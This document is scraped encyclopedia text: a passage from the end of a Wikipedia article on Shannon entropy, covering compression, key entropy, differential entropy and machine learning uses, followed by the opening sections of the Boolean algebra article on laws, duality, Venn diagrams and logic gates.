interpreted as being proportional to the amount of further Shannon information needed to define the detailed microscopic state of the system, that remains uncommunicated by a description solely in terms of the macroscopic variables of classical thermodynamics, with the constant of proportionality being just the Boltzmann constant. Adding heat to a system increases its thermodynamic entropy because it increases the number of possible microscopic states of the system that are consistent with the measurable values of its macroscopic variables, making any complete state description longer. (See article:maximum entropy thermodynamics).Maxwell's demoncan (hypothetically) reduce the thermodynamic entropy of a system by using information about the states of individual molecules; but, asLandauer(from 1961) and co-workers[22]have shown, to function the demon himself must increase thermodynamic entropy in the process, by at least the amount of Shannon information he proposes to first acquire and store; and so the total thermodynamic entropy does not decrease (which resolves the paradox).Landauer's principleimposes a lower bound on the amount of heat a computer must generate to process a given amount of information, though modern computers are far less efficient. Shannon's definition of entropy, when applied to an information source, can determine the minimum channel capacity required to reliably transmit the source as encoded binary digits. Shannon's entropy measures the information contained in a message as opposed to the portion of the message that is determined (or predictable). Examples of the latter include redundancy in language structure or statistical properties relating to the occurrence frequencies of letter or word pairs, triplets etc. The minimum channel capacity can be realized in theory by using thetypical setor in practice usingHuffman,Lempel–Zivorarithmetic coding. (See alsoKolmogorov complexity.) In practice, compression algorithms deliberately include some judicious redundancy in the form ofchecksumsto protect against errors. Theentropy rateof a data source is the average number of bits per symbol needed to encode it. Shannon's experiments with human predictors show an information rate between 0.6 and 1.3 bits per character in English;[23]thePPM compression algorithmcan achieve a compression ratio of 1.5 bits per character in English text. If acompressionscheme is lossless – one in which you can always recover the entire original message by decompression – then a compressed message has the same quantity of information as the original but is communicated in fewer characters. It has more information (higher entropy) per character. A compressed message has lessredundancy.Shannon's source coding theoremstates a lossless compression scheme cannot compress messages, on average, to havemorethan one bit of information per bit of message, but that any valuelessthan one bit of information per bit of message can be attained by employing a suitable coding scheme. The entropy of a message per bit multiplied by the length of that message is a measure of how much total information the message contains. Shannon's theorem also implies that no lossless compression scheme can shortenallmessages. If some messages come out shorter, at least one must come out longer due to thepigeonhole principle. In practical use, this is generally not a problem, because one is usually only interested in compressing certain types of messages, such as a document in English, as opposed to gibberish text, or digital photographs rather than noise, and it is unimportant if a compression algorithm makes some unlikely or uninteresting sequences larger. A 2011 study inScienceestimates the world's technological capacity to store and communicate optimally compressed information normalized on the most effective compression algorithms available in the year 2007, therefore estimating the entropy of the technologically available sources.[24]: 60–65 The authors estimate humankind technological capacity to store information (fully entropically compressed) in 1986 and again in 2007. They break the information into three categories—to store information on a medium, to receive information through one-waybroadcastnetworks, or to exchange information through two-waytelecommunications networks.[24] Entropy is one of several ways to measure biodiversity and is applied in the form of theShannon index.[25]A diversity index is a quantitative statistical measure of how many different types exist in a dataset, such as species in a community, accounting for ecologicalrichness,evenness, anddominance. Specifically, Shannon entropy is the logarithm of1D, thetrue diversityindex with parameter equal to 1. The Shannon index is related to the proportional abundances of types. There are a number of entropy-related concepts that mathematically quantify information content of a sequence or message: (The "rate of self-information" can also be defined for a particular sequence of messages or symbols generated by a given stochastic process: this will always be equal to the entropy rate in the case of astationary process.) Otherquantities of informationare also used to compare or relate different sources of information. It is important not to confuse the above concepts. Often it is only clear from context which one is meant. For example, when someone says that the "entropy" of the English language is about 1 bit per character, they are actually modeling the English language as a stochastic process and talking about its entropyrate. Shannon himself used the term in this way. If very large blocks are used, the estimate of per-character entropy rate may become artificially low because the probability distribution of the sequence is not known exactly; it is only an estimate. If one considers the text of every book ever published as a sequence, with each symbol being the text of a complete book, and if there areNpublished books, and each book is only published once, the estimate of the probability of each book is1/N, and the entropy (in bits) is−log2(1/N) = log2(N). As a practical code, this corresponds to assigning each book aunique identifierand using it in place of the text of the book whenever one wants to refer to the book. This is enormously useful for talking about books, but it is not so useful for characterizing the information content of an individual book, or of language in general: it is not possible to reconstruct the book from its identifier without knowing the probability distribution, that is, the complete text of all the books. The key idea is that the complexity of the probabilistic model must be considered.Kolmogorov complexityis a theoretical generalization of this idea that allows the consideration of the information content of a sequence independent of any particular probability model; it considers the shortestprogramfor auniversal computerthat outputs the sequence. A code that achieves the entropy rate of a sequence for a given model, plus the codebook (i.e. the probabilistic model), is one such program, but it may not be the shortest. The Fibonacci sequence is 1, 1, 2, 3, 5, 8, 13, .... treating the sequence as a message and each number as a symbol, there are almost as many symbols as there are characters in the message, giving an entropy of approximatelylog2(n). The first 128 symbols of the Fibonacci sequence has an entropy of approximately 7 bits/symbol, but the sequence can be expressed using a formula [F(n) = F(n−1) + F(n−2)forn= 3, 4, 5, ...,F(1) =1,F(2) = 1] and this formula has a much lower entropy and applies to any length of the Fibonacci sequence. Incryptanalysis, entropy is often roughly used as a measure of the unpredictability of a cryptographic key, though its realuncertaintyis unmeasurable. For example, a 128-bit key that is uniformly and randomly generated has 128 bits of entropy. It also takes (on average)2127{\displaystyle 2^{127}}guesses to break by brute force. Entropy fails to capture the number of guesses required if the possible keys are not chosen uniformly.[26][27]Instead, a measure calledguessworkcan be used to measure the effort required for a brute force attack.[28] Other problems may arise from non-uniform distributions used in cryptography. For example, a 1,000,000-digit binaryone-time padusing exclusive or. If the pad has 1,000,000 bits of entropy, it is perfect. If the pad has 999,999 bits of entropy, evenly distributed (each individual bit of the pad having 0.999999 bits of entropy) it may provide good security. But if the pad has 999,999 bits of entropy, where the first bit is fixed and the remaining 999,999 bits are perfectly random, the first bit of the ciphertext will not be encrypted at all. A common way to define entropy for text is based on theMarkov modelof text. For an order-0 source (each character is selected independent of the last characters), the binary entropy is: H(S)=−∑ipilog⁡pi,{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\log p_{i},} wherepiis the probability ofi. For a first-orderMarkov source(one in which the probability of selecting a character is dependent only on the immediately preceding character), theentropy rateis:[citation needed] H(S)=−∑ipi∑jpi(j)log⁡pi(j),{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}\ p_{i}(j)\log p_{i}(j),} whereiis astate(certain preceding characters) andpi(j){\displaystyle p_{i}(j)}is the probability ofjgivenias the previous character. For a second order Markov source, the entropy rate is H(S)=−∑ipi∑jpi(j)∑kpi,j(k)log⁡pi,j(k).{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}p_{i}(j)\sum _{k}p_{i,j}(k)\ \log p_{i,j}(k).} A source setX{\displaystyle {\mathcal {X}}}with a non-uniform distribution will have less entropy than the same set with a uniform distribution (i.e. the "optimized alphabet"). This deficiency in entropy can be expressed as a ratio called efficiency:[29] η(X)=HHmax=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n).{\displaystyle \eta (X)={\frac {H}{H_{\text{max}}}}=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}.}Applying the basic properties of the logarithm, this quantity can also be expressed as:η(X)=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n)=∑i=1nlogb⁡(p(xi)−p(xi))logb⁡(n)=∑i=1nlogn⁡(p(xi)−p(xi))=logn⁡(∏i=1np(xi)−p(xi)).{\displaystyle {\begin{aligned}\eta (X)&=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}=\sum _{i=1}^{n}{\frac {\log _{b}\left(p(x_{i})^{-p(x_{i})}\right)}{\log _{b}(n)}}\\[1ex]&=\sum _{i=1}^{n}\log _{n}\left(p(x_{i})^{-p(x_{i})}\right)=\log _{n}\left(\prod _{i=1}^{n}p(x_{i})^{-p(x_{i})}\right).\end{aligned}}} Efficiency has utility in quantifying the effective use of acommunication channel. This formulation is also referred to as the normalized entropy, as the entropy is divided by the maximum entropylogb⁡(n){\displaystyle {\log _{b}(n)}}. Furthermore, the efficiency is indifferent to the choice of (positive) baseb, as indicated by the insensitivity within the final logarithm above thereto. The Shannon entropy is restricted to random variables taking discrete values. The corresponding formula for a continuous random variable withprobability density functionf(x)with finite or infinite supportX{\displaystyle \mathbb {X} }on the real line is defined by analogy, using the above form of the entropy as an expectation:[11]: 224 H(X)=E[−log⁡f(X)]=−∫Xf(x)log⁡f(x)dx.{\displaystyle \mathrm {H} (X)=\mathbb {E} [-\log f(X)]=-\int _{\mathbb {X} }f(x)\log f(x)\,\mathrm {d} x.} This is the differential entropy (or continuous entropy). A precursor of the continuous entropyh[f]is the expression for the functionalΗin theH-theoremof Boltzmann. Although the analogy between both functions is suggestive, the following question must be set: is the differential entropy a valid extension of the Shannon discrete entropy? Differential entropy lacks a number of properties that the Shannon discrete entropy has – it can even be negative – and corrections have been suggested, notablylimiting density of discrete points. To answer this question, a connection must be established between the two functions: In order to obtain a generally finite measure as thebin sizegoes to zero. In the discrete case, the bin size is the (implicit) width of each of then(finite or infinite) bins whose probabilities are denoted bypn. As the continuous domain is generalized, the width must be made explicit. To do this, start with a continuous functionfdiscretized into bins of sizeΔ{\displaystyle \Delta }. By the mean-value theorem there exists a valuexiin each bin such thatf(xi)Δ=∫iΔ(i+1)Δf(x)dx{\displaystyle f(x_{i})\Delta =\int _{i\Delta }^{(i+1)\Delta }f(x)\,dx}the integral of the functionfcan be approximated (in the Riemannian sense) by∫−∞∞f(x)dx=limΔ→0∑i=−∞∞f(xi)Δ,{\displaystyle \int _{-\infty }^{\infty }f(x)\,dx=\lim _{\Delta \to 0}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta ,}where this limit and "bin size goes to zero" are equivalent. We will denoteHΔ:=−∑i=−∞∞f(xi)Δlog⁡(f(xi)Δ){\displaystyle \mathrm {H} ^{\Delta }:=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log \left(f(x_{i})\Delta \right)}and expanding the logarithm, we haveHΔ=−∑i=−∞∞f(xi)Δlog⁡(f(xi))−∑i=−∞∞f(xi)Δlog⁡(Δ).{\displaystyle \mathrm {H} ^{\Delta }=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(\Delta ).} AsΔ → 0, we have ∑i=−∞∞f(xi)Δ→∫−∞∞f(x)dx=1∑i=−∞∞f(xi)Δlog⁡(f(xi))→∫−∞∞f(x)log⁡f(x)dx.{\displaystyle {\begin{aligned}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta &\to \int _{-\infty }^{\infty }f(x)\,dx=1\\\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))&\to \int _{-\infty }^{\infty }f(x)\log f(x)\,dx.\end{aligned}}} Note;log(Δ) → −∞asΔ → 0, requires a special definition of the differential or continuous entropy: h[f]=limΔ→0(HΔ+log⁡Δ)=−∫−∞∞f(x)log⁡f(x)dx,{\displaystyle h[f]=\lim _{\Delta \to 0}\left(\mathrm {H} ^{\Delta }+\log \Delta \right)=-\int _{-\infty }^{\infty }f(x)\log f(x)\,dx,} which is, as said before, referred to as the differential entropy. This means that the differential entropyis nota limit of the Shannon entropy forn→ ∞. Rather, it differs from the limit of the Shannon entropy by an infinite offset (see also the article oninformation dimension). It turns out as a result that, unlike the Shannon entropy, the differential entropy isnotin general a good measure of uncertainty or information. For example, the differential entropy can be negative; also it is not invariant under continuous co-ordinate transformations. This problem may be illustrated by a change of units whenxis a dimensioned variable.f(x)will then have the units of1/x. The argument of the logarithm must be dimensionless, otherwise it is improper, so that the differential entropy as given above will be improper. IfΔis some "standard" value ofx(i.e. "bin size") and therefore has the same units, then a modified differential entropy may be written in proper form as:H=∫−∞∞f(x)log⁡(f(x)Δ)dx,{\displaystyle \mathrm {H} =\int _{-\infty }^{\infty }f(x)\log(f(x)\,\Delta )\,dx,}and the result will be the same for any choice of units forx. In fact, the limit of discrete entropy asN→∞{\displaystyle N\rightarrow \infty }would also include a term oflog⁡(N){\displaystyle \log(N)}, which would in general be infinite. This is expected: continuous variables would typically have infinite entropy when discretized. Thelimiting density of discrete pointsis really a measure of how much easier a distribution is to describe than a distribution that is uniform over its quantization scheme. Another useful measure of entropy that works equally well in the discrete and the continuous case is therelative entropyof a distribution. It is defined as theKullback–Leibler divergencefrom the distribution to a reference measuremas follows. Assume that a probability distributionpisabsolutely continuouswith respect to a measurem, i.e. is of the formp(dx) =f(x)m(dx)for some non-negativem-integrable functionfwithm-integral 1, then the relative entropy can be defined asDKL(p‖m)=∫log⁡(f(x))p(dx)=∫f(x)log⁡(f(x))m(dx).{\displaystyle D_{\mathrm {KL} }(p\|m)=\int \log(f(x))p(dx)=\int f(x)\log(f(x))m(dx).} In this form the relative entropy generalizes (up to change in sign) both the discrete entropy, where the measuremis thecounting measure, and the differential entropy, where the measuremis theLebesgue measure. If the measuremis itself a probability distribution, the relative entropy is non-negative, and zero ifp=mas measures. It is defined for any measure space, hence coordinate independent and invariant under co-ordinate reparameterizations if one properly takes into account the transformation of the measurem. The relative entropy, and (implicitly) entropy and differential entropy, do depend on the "reference" measurem. Terence Taoused entropy to make a useful connection trying to solve theErdős discrepancy problem.[30][31] Intuitively the idea behind the proof was if there is low information in terms of the Shannon entropy between consecutive random variables (here the random variable is defined using theLiouville function(which is a useful mathematical function for studying distribution of primes)XH=λ(n+H){\displaystyle \lambda (n+H)}. And in an interval [n, n+H] the sum over that interval could become arbitrary large. For example, a sequence of +1's (which are values ofXHcould take) have trivially low entropy and their sum would become big. But the key insight was showing a reduction in entropy by non negligible amounts as one expands H leading inturn to unbounded growth of a mathematical object over this random variable is equivalent to showing the unbounded growth per theErdős discrepancy problem. The proof is quite involved and it brought together breakthroughs not just in novel use of Shannon entropy, but also it used theLiouville functionalong with averages of modulated multiplicative functions[32]in short intervals. Proving it also broke the "parity barrier"[33]for this specific problem. While the use of Shannon entropy in the proof is novel it is likely to open new research in this direction. Entropy has become a useful quantity incombinatorics. A simple example of this is an alternative proof of theLoomis–Whitney inequality: for every subsetA⊆Zd, we have|A|d−1≤∏i=1d|Pi(A)|{\displaystyle |A|^{d-1}\leq \prod _{i=1}^{d}|P_{i}(A)|}wherePiis theorthogonal projectionin theith coordinate:Pi(A)={(x1,…,xi−1,xi+1,…,xd):(x1,…,xd)∈A}.{\displaystyle P_{i}(A)=\{(x_{1},\ldots ,x_{i-1},x_{i+1},\ldots ,x_{d}):(x_{1},\ldots ,x_{d})\in A\}.} The proof follows as a simple corollary ofShearer's inequality: ifX1, ...,Xdare random variables andS1, ...,Snare subsets of{1, ...,d} such that every integer between 1 anddlies in exactlyrof these subsets, thenH[(X1,…,Xd)]≤1r∑i=1nH[(Xj)j∈Si]{\displaystyle \mathrm {H} [(X_{1},\ldots ,X_{d})]\leq {\frac {1}{r}}\sum _{i=1}^{n}\mathrm {H} [(X_{j})_{j\in S_{i}}]}where(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is the Cartesian product of random variablesXjwith indexesjinSi(so the dimension of this vector is equal to the size ofSi). We sketch how Loomis–Whitney follows from this: Indeed, letXbe a uniformly distributed random variable with values inAand so that each point inAoccurs with equal probability. Then (by the further properties of entropy mentioned above)Η(X) = log|A|, where|A|denotes the cardinality ofA. LetSi= {1, 2, ...,i−1,i+1, ...,d}. The range of(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is contained inPi(A)and henceH[(Xj)j∈Si]≤log⁡|Pi(A)|{\displaystyle \mathrm {H} [(X_{j})_{j\in S_{i}}]\leq \log |P_{i}(A)|}. Now use this to bound the right side of Shearer's inequality and exponentiate the opposite sides of the resulting inequality you obtain. For integers0 <k<nletq=k/n. Then2nH(q)n+1≤(nk)≤2nH(q),{\displaystyle {\frac {2^{n\mathrm {H} (q)}}{n+1}}\leq {\tbinom {n}{k}}\leq 2^{n\mathrm {H} (q)},}where[34]: 43H(q)=−qlog2⁡(q)−(1−q)log2⁡(1−q).{\displaystyle \mathrm {H} (q)=-q\log _{2}(q)-(1-q)\log _{2}(1-q).} ∑i=0n(ni)qi(1−q)n−i=(q+(1−q))n=1.{\displaystyle \sum _{i=0}^{n}{\tbinom {n}{i}}q^{i}(1-q)^{n-i}=(q+(1-q))^{n}=1.}Rearranging gives the upper bound. For the lower bound one first shows, using some algebra, that it is the largest term in the summation. But then,(nk)qqn(1−q)n−nq≥1n+1{\displaystyle {\binom {n}{k}}q^{qn}(1-q)^{n-nq}\geq {\frac {1}{n+1}}}since there aren+ 1terms in the summation. Rearranging gives the lower bound. A nice interpretation of this is that the number of binary strings of lengthnwith exactlykmany 1's is approximately2nH(k/n){\displaystyle 2^{n\mathrm {H} (k/n)}}.[35] Machine learningtechniques arise largely from statistics and also information theory. In general, entropy is a measure of uncertainty and the objective of machine learning is to minimize uncertainty. Decision tree learningalgorithms use relative entropy to determine the decision rules that govern the data at each node.[36]Theinformation gain in decision treesIG(Y,X){\displaystyle IG(Y,X)}, which is equal to the difference between the entropy ofY{\displaystyle Y}and the conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}, quantifies the expected information, or the reduction in entropy, from additionally knowing the value of an attributeX{\displaystyle X}. The information gain is used to identify which attributes of the dataset provide the most information and should be used to split the nodes of the tree optimally. Bayesian inferencemodels often apply theprinciple of maximum entropyto obtainprior probabilitydistributions.[37]The idea is that the distribution that best represents the current state of knowledge of a system is the one with the largest entropy, and is therefore suitable to be the prior. Classification in machine learningperformed bylogistic regressionorartificial neural networksoften employs a standard loss function, calledcross-entropyloss, that minimizes the average cross entropy between ground truth and predicted distributions.[38]In general, cross entropy is a measure of the differences between two datasets similar to the KL divergence (also known as relative entropy). This article incorporates material from Shannon's entropy onPlanetMath, which is licensed under theCreative Commons Attribution/Share-Alike License.
https://en.wikipedia.org/wiki/Shannon_entropy
Inmathematicsandmathematical logic,Boolean algebrais a branch ofalgebra. It differs fromelementary algebrain two ways. First, the values of thevariablesare thetruth valuestrueandfalse, usually denoted by 1 and 0, whereas in elementary algebra the values of the variables are numbers. Second, Boolean algebra useslogical operatorssuch asconjunction(and) denoted as∧,disjunction(or) denoted as∨, andnegation(not) denoted as¬. Elementary algebra, on the other hand, uses arithmetic operators such as addition, multiplication, subtraction, and division. Boolean algebra is therefore a formal way of describinglogical operationsin the same way that elementary algebra describes numerical operations. Boolean algebra was introduced byGeorge Boolein his first bookThe Mathematical Analysis of Logic(1847),[1]and set forth more fully in hisAn Investigation of the Laws of Thought(1854).[2]According toHuntington, the termBoolean algebrawas first suggested byHenry M. Shefferin 1913,[3]althoughCharles Sanders Peircegave the title "A Boolian [sic] Algebra with One Constant" to the first chapter of his "The Simplest Mathematics" in 1880.[4]Boolean algebra has been fundamental in the development ofdigital electronics, and is provided for in all modernprogramming languages. It is also used inset theoryandstatistics.[5] A precursor of Boolean algebra wasGottfried Wilhelm Leibniz'salgebra of concepts. The usage of binary in relation to theI Chingwas central to Leibniz'scharacteristica universalis. It eventually created the foundations of algebra of concepts.[6]Leibniz's algebra of concepts is deductively equivalent to the Boolean algebra of sets.[7] Boole's algebra predated the modern developments inabstract algebraandmathematical logic; it is however seen as connected to the origins of both fields.[8]In an abstract setting, Boolean algebra was perfected in the late 19th century byJevons,Schröder,Huntingtonand others, until it reached the modern conception of an (abstract)mathematical structure.[8]For example, the empirical observation that one can manipulate expressions in thealgebra of sets, by translating them into expressions in Boole's algebra, is explained in modern terms by saying that the algebra of sets isaBoolean algebra(note theindefinite article). In fact,M. H. Stoneproved in 1936that every Boolean algebra isisomorphicto afield of sets.[9][10] In the 1930s, while studyingswitching circuits,Claude Shannonobserved that one could also apply the rules of Boole's algebra in this setting,[11]and he introducedswitching algebraas a way to analyze and design circuits by algebraic means in terms oflogic gates. Shannon already had at his disposal the abstract mathematical apparatus, thus he cast his switching algebra as thetwo-element Boolean algebra. In modern circuit engineering settings, there is little need to consider other Boolean algebras, thus "switching algebra" and "Boolean algebra" are often used interchangeably.[12][13][14] Efficient implementationofBoolean functionsis a fundamental problem in thedesignofcombinational logiccircuits. Modernelectronic design automationtools forvery-large-scale integration(VLSI) circuits often rely on an efficient representation of Boolean functions known as (reduced ordered)binary decision diagrams(BDD) forlogic synthesisandformal verification.[15] Logic sentences that can be expressed in classicalpropositional calculushave anequivalent expressionin Boolean algebra. Thus,Boolean logicis sometimes used to denote propositional calculus performed in this way.[16][17][18]Boolean algebra is not sufficient to capture logic formulas usingquantifiers, like those fromfirst-order logic. Although the development ofmathematical logicdid not follow Boole's program, the connection between his algebra and logic was later put on firm ground in the setting ofalgebraic logic, which also studies the algebraic systems of many other logics.[8]Theproblem of determining whetherthe variables of a given Boolean (propositional) formula can be assigned in such a way as to make the formula evaluate to true is called theBoolean satisfiability problem(SAT), and is of importance totheoretical computer science, being the first problem shown to beNP-complete. The closely relatedmodel of computationknown as aBoolean circuitrelatestime complexity(of analgorithm) tocircuit complexity. Whereas expressions denote mainlynumbersin elementary algebra, in Boolean algebra, they denote thetruth valuesfalseandtrue. These values are represented with thebits, 0 and 1. They do not behave like theintegers0 and 1, for which1 + 1 = 2, but may be identified with the elements of thetwo-element fieldGF(2), that is,integer arithmetic modulo 2, for which1 + 1 = 0. Addition and multiplication then play the Boolean roles of XOR (exclusive-or) and AND (conjunction), respectively, with disjunctionx∨y(inclusive-or) definable asx+y−xyand negation¬xas1 −x. InGF(2),−may be replaced by+, since they denote the same operation; however, this way of writing Boolean operations allows applying the usual arithmetic operations of integers (this may be useful when using a programming language in whichGF(2)is not implemented). Boolean algebra also deals withfunctionswhich have their values in the set{0,1}. Asequence of bitsis a commonly used example of such a function. Another common example is the totality of subsets of a setE: to a subsetFofE, one can define theindicator functionthat takes the value1onF, and0outsideF. The most general example is the set elements of aBoolean algebra, with all of the foregoing being instances thereof. As with elementary algebra, the purely equational part of the theory may be developed, without considering explicit values for the variables.[19] While Elementary algebra has four operations (addition, subtraction, multiplication, and division), the Boolean algebra has only three basic operations:conjunction,disjunction, andnegation, expressed with the correspondingbinary operatorsAND(∧{\displaystyle \land }) and OR (∨{\displaystyle \lor }) and theunary operatorNOT(¬{\displaystyle \neg }), collectively referred to asBoolean operators.[20]Variables in Boolean algebra that store the logical value of 0 and 1 are called theBoolean variables. They are used to store either true or false values.[21]The basic operations on Boolean variablesxandyare defined as follows: Alternatively, the values ofx∧y,x∨y, and ¬xcan be expressed by tabulating their values withtruth tablesas follows:[22] When used in expressions, the operators are applied according to the precedence rules. As with elementary algebra, expressions in parentheses are evaluated first, following the precedence rules.[23] If the truth values 0 and 1 are interpreted as integers, these operations may be expressed with the ordinary operations of arithmetic (wherex+yuses addition andxyuses multiplication), or by the minimum/maximum functions: One might consider that only negation and one of the two other operations are basic because of the following identities that allow one to define conjunction in terms of negation and the disjunction, and vice versa (De Morgan's laws):[24] Operations composed from the basic operations include, among others, the following: These definitions give rise to the following truth tables giving the values of these operations for all four possible inputs. Alawof Boolean algebra is anidentitysuch asx∨ (y∨z) = (x∨y) ∨zbetween two Boolean terms, where aBoolean termis defined as an expression built up from variables and the constants 0 and 1 using the operations ∧, ∨, and ¬. The concept can be extended to terms involving other Boolean operations such as ⊕, →, and ≡, but such extensions are unnecessary for the purposes to which the laws are put. Such purposes include the definition of aBoolean algebraas anymodelof the Boolean laws, and as a means for deriving new laws from old as in the derivation ofx∨ (y∧z) =x∨ (z∧y)fromy∧z=z∧y(as treated in§ Axiomatizing Boolean algebra). Boolean algebra satisfies many of the same laws as ordinary algebra when one matches up ∨ with addition and ∧ with multiplication. In particular the following laws are common to both kinds of algebra:[25][26] The following laws hold in Boolean algebra, but not in ordinary algebra: Takingx= 2in the third law above shows that it is not an ordinary algebra law, since2 × 2 = 4. The remaining five laws can be falsified in ordinary algebra by taking all variables to be 1. For example, in absorption law 1, the left hand side would be1(1 + 1) = 2, while the right hand side would be 1 (and so on). All of the laws treated thus far have been for conjunction and disjunction. These operations have the property that changing either argument either leaves the output unchanged, or the output changes in the same way as the input. Equivalently, changing any variable from 0 to 1 never results in the output changing from 1 to 0. Operations with this property are said to bemonotone. Thus the axioms thus far have all been for monotonic Boolean logic. Nonmonotonicity enters via complement ¬ as follows.[5] The complement operation is defined by the following two laws. All properties of negation including the laws below follow from the above two laws alone.[5] In both ordinary and Boolean algebra, negation works by exchanging pairs of elements, hence in both algebras it satisfies the double negation law (also called involution law) But whereasordinary algebrasatisfies the two laws Boolean algebra satisfiesDe Morgan's laws: The laws listed above define Boolean algebra, in the sense that they entail the rest of the subject. The lawscomplementation1 and 2, together with the monotone laws, suffice for this purpose and can therefore be taken as one possiblecompleteset of laws oraxiomatizationof Boolean algebra. Every law of Boolean algebra follows logically from these axioms. Furthermore, Boolean algebras can then be defined as themodelsof these axioms as treated in§ Boolean algebras. Writing down further laws of Boolean algebra cannot give rise to any new consequences of these axioms, nor can it rule out any model of them. In contrast, in a list of some but not all of the same laws, there could have been Boolean laws that did not follow from those on the list, and moreover there would have been models of the listed laws that were not Boolean algebras. This axiomatization is by no means the only one, or even necessarily the most natural given that attention was not paid as to whether some of the axioms followed from others, but there was simply a choice to stop when enough laws had been noticed, treated further in§ Axiomatizing Boolean algebra. Or the intermediate notion of axiom can be sidestepped altogether by defining a Boolean law directly as anytautology, understood as an equation that holds for all values of its variables over 0 and 1.[27][28]All these definitions of Boolean algebra can be shown to be equivalent. Principle: If {X, R} is apartially ordered set, then {X, R(inverse)} is also a partially ordered set. There is nothing special about the choice of symbols for the values of Boolean algebra. 0 and 1 could be renamed toαandβ, and as long as it was done consistently throughout, it would still be Boolean algebra, albeit with some obvious cosmetic differences. But suppose 0 and 1 were renamed 1 and 0 respectively. Then it would still be Boolean algebra, and moreover operating on the same values. However, it would not be identical to our original Boolean algebra because now ∨ behaves the way ∧ used to do and vice versa. So there are still some cosmetic differences to show that the notation has been changed, despite the fact that 0s and 1s are still being used. But if in addition to interchanging the names of the values, the names of the two binary operations are also interchanged,nowthere is no trace of what was done. The end product is completely indistinguishable from what was started with. The columns forx∧yandx∨yin the truth tables have changed places, but that switch is immaterial. When values and operations can be paired up in a way that leaves everything important unchanged when all pairs are switched simultaneously, the members of each pair are calleddualto each other. Thus 0 and 1 are dual, and ∧ and ∨ are dual. Theduality principle, also calledDe Morgan duality, asserts that Boolean algebra is unchanged when all dual pairs are interchanged. One change not needed to make as part of this interchange was to complement. Complement is aself-dualoperation. The identity or do-nothing operationx(copy the input to the output) is also self-dual. A more complicated example of a self-dual operation is(x∧y) ∨ (y∧z) ∨ (z∧x). There is no self-dual binary operation that depends on both its arguments. A composition of self-dual operations is a self-dual operation. For example, iff(x,y,z) = (x∧y) ∨ (y∧z) ∨ (z∧x), thenf(f(x,y,z),x,t)is a self-dual operation of four argumentsx,y,z,t. The principle of duality can be explained from agroup theoryperspective by the fact that there are exactly four functions that are one-to-one mappings (automorphisms) of the set ofBoolean polynomialsback to itself: the identity function, the complement function, the dual function and the contradual function (complemented dual). These four functions form agroupunderfunction composition, isomorphic to theKlein four-group,actingon the set of Boolean polynomials.Walter Gottschalkremarked that consequently a more appropriate name for the phenomenon would be theprinciple(orsquare)of quaternality.[5]: 21–22 AVenn diagram[29]can be used as a representation of a Boolean operation using shaded overlapping regions. There is one region for each variable, all circular in the examples here. The interior and exterior of regionxcorresponds respectively to the values 1 (true) and 0 (false) for variablex. The shading indicates the value of the operation for each combination of regions, with dark denoting 1 and light 0 (some authors use the opposite convention). The three Venn diagrams in the figure below represent respectively conjunctionx∧y, disjunctionx∨y, and complement ¬x. For conjunction, the region inside both circles is shaded to indicate thatx∧yis 1 when both variables are 1. The other regions are left unshaded to indicate thatx∧yis 0 for the other three combinations. The second diagram represents disjunctionx∨yby shading those regions that lie inside either or both circles. The third diagram represents complement ¬xby shading the regionnotinside the circle. While we have not shown the Venn diagrams for the constants 0 and 1, they are trivial, being respectively a white box and a dark box, neither one containing a circle. However, we could put a circle forxin those boxes, in which case each would denote a function of one argument,x, which returns the same value independently ofx, called a constant function. As far as their outputs are concerned, constants and constant functions are indistinguishable; the difference is that a constant takes no arguments, called azeroaryornullaryoperation, while a constant function takes one argument, which it ignores, and is aunaryoperation. Venn diagrams are helpful in visualizing laws. The commutativity laws for ∧ and ∨ can be seen from the symmetry of the diagrams: a binary operation that was not commutative would not have a symmetric diagram because interchangingxandywould have the effect of reflecting the diagram horizontally and any failure of commutativity would then appear as a failure of symmetry. Idempotenceof ∧ and ∨ can be visualized by sliding the two circles together and noting that the shaded area then becomes the whole circle, for both ∧ and ∨. To see the first absorption law,x∧ (x∨y) =x, start with the diagram in the middle forx∨yand note that the portion of the shaded area in common with thexcircle is the whole of thexcircle. For the second absorption law,x∨ (x∧y) =x, start with the left diagram forx∧yand note that shading the whole of thexcircle results in just thexcircle being shaded, since the previous shading was inside thexcircle. The double negation law can be seen by complementing the shading in the third diagram for ¬x, which shades thexcircle. To visualize the first De Morgan's law,(¬x) ∧ (¬y) = ¬(x∨y), start with the middle diagram forx∨yand complement its shading so that only the region outside both circles is shaded, which is what the right hand side of the law describes. The result is the same as if we shaded that region which is both outside thexcircleandoutside theycircle, i.e. the conjunction of their exteriors, which is what the left hand side of the law describes. The second De Morgan's law,(¬x) ∨ (¬y) = ¬(x∧y), works the same way with the two diagrams interchanged. The first complement law,x∧ ¬x= 0, says that the interior and exterior of thexcircle have no overlap. The second complement law,x∨ ¬x= 1, says that everything is either inside or outside thexcircle. Digital logic is the application of the Boolean algebra of 0 and 1 to electronic hardware consisting oflogic gatesconnected to form acircuit diagram. Each gate implements a Boolean operation, and is depicted schematically by a shape indicating the operation. The shapes associated with the gates for conjunction (AND-gates), disjunction (OR-gates), and complement (inverters) are as follows:[30] The lines on the left of each gate represent input wires orports. The value of the input is represented by a voltage on the lead. For so-called "active-high" logic, 0 is represented by a voltage close to zero or "ground," while 1 is represented by a voltage close to the supply voltage; active-low reverses this. The line on the right of each gate represents the output port, which normally follows the same voltage conventions as the input ports. Complement is implemented with an inverter gate. The triangle denotes the operation that simply copies the input to the output; the small circle on the output denotes the actual inversion complementing the input. The convention of putting such a circle on any port means that the signal passing through this port is complemented on the 